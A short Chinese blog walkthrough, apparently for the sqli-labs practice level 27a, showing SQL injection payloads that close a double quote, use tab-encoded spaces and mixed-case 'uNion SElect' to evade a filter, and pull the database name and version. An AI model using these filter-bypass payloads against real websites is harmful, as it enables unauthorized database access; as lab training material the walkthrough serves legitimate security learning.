sqllab第二十七A关通关笔记

I_WORM2024-03-20 20:00

知识点:

  • 双引号闭合
  • union select 大小写绕过
    • Union Select
  • 这里不能进行错误注入,无回显

经过测试发现这是一个双引号闭合

构造payload:id=1"%09and%091="1

页面成功回显

构造payload:id=0"%09uNion%09SElect%091,2,3%09"1

页面成功回显除了输入内容

获取数据库名和版本信息

构造payload:id=0"%09uNion%09SElect%091,database(),version()%09"1

成功获取了数据库名和版本信息

10

相关推荐
雍凉明月夜7 小时前
深度学习网络笔记Ⅴ(Transformer源码详解)
笔记·深度学习·transformer
week_泽7 小时前
小程序云函数全面总结笔记_5
笔记·小程序
wdfk_prog7 小时前
[Linux]学习笔记系列 -- [fs]read_write
linux·笔记·学习
别了,李亚普诺夫8 小时前
PCB设计学习笔记
笔记·学习
koo3648 小时前
pytorch深度学习笔记10
pytorch·笔记·深度学习
FakeOccupational8 小时前
【电路笔记 电源模块】MOSFET导通&线性工作条件 + 栅极驱动芯片 + 高压侧N沟道MOS管驱动器
笔记
半夏知半秋8 小时前
rust学习-探讨为什么需要标注生命周期
开发语言·笔记·学习·算法·rust
我要学好英语8 小时前
矩阵论笔记整理
笔记·线性代数·矩阵
HXR_plume9 小时前
【Web信息处理与应用课程笔记7】知识抽取与表达
笔记·知识图谱·信息检索
week_泽9 小时前
百战商城商品数据云函数化改造总结_百战_3
数据库·笔记·微信小程序·小程序
热门推荐
01GitHub 镜像站点02安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)03Labelme从安装到标注:零基础完整指南04Linux下V2Ray安装配置指南05手把手教你通过Gemini3 pro 学生认证,白用一年,手慢无!06【踩坑笔记】50系显卡适配的 PyTorch 安装07GitLab 零基础入门指南:从安装到项目管理全流程08jdk21下载、安装(Windows、Linux、macOS)09UV安装并设置国内源102025-04-03 Latex学习1——本地配置Latex + VScode环境